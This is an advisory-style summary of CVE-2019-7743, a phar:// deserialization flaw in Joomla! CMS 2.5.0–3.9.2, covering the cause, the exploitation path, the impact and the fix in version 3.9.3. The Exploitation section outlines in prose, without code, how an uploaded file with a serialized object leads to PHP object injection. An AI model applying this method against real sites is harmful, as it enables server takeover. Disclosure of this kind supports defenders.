CVE-2019-7743

Vulnerability

Joomla! CMS versions 2.5.0 through 3.9.2 do not protect against the use of the phar:// stream wrapper for files that are not .phar files [1][3][4]. This allows an attacker to trigger PHP object injection by supplying a crafted phar:// URI that points to a file (e.g., an uploaded image) containing a serialized PHP object. The vulnerability exists because the CMS lacks a protection mechanism similar to the TYPO3 PHAR stream wrapper [4].

Exploitation

An attacker needs the ability to upload a file containing a serialized PHP payload or to control a file path passed to a PHP function that uses the phar:// wrapper [1][4]. The attacker then crafts a URL or input that triggers the phar:// stream wrapper on that file, leading to deserialization of the embedded object. No authentication is required if the vulnerable code path is reachable from the frontend; some attack vectors may require a low-privileged user. No special race condition or user interaction is needed beyond the initial file upload [1][4].

Impact

Successful exploitation allows an attacker to execute arbitrary PHP code on the server, potentially leading to full compromise of the Joomla! installation [1][4]. The impact is high: confidentiality, integrity, and availability can be affected. The attacker gains the ability to read, modify, or delete files, execute commands, and potentially pivot to other systems [1][4].

Mitigation

The vulnerability is fixed in Joomla! CMS version 3.9.3, released on 2019-02-12 [4]. Users should upgrade immediately. The fix implements the TYPO3 PHAR stream wrapper to globally disallow usage of the phar:// handler for non-.phar files [4]. No workarounds are provided for versions prior to 3.9.3. The vulnerability is not listed in CISA's Known Exploited Vulnerabilities (KEV) catalog as of the publication date [1][4].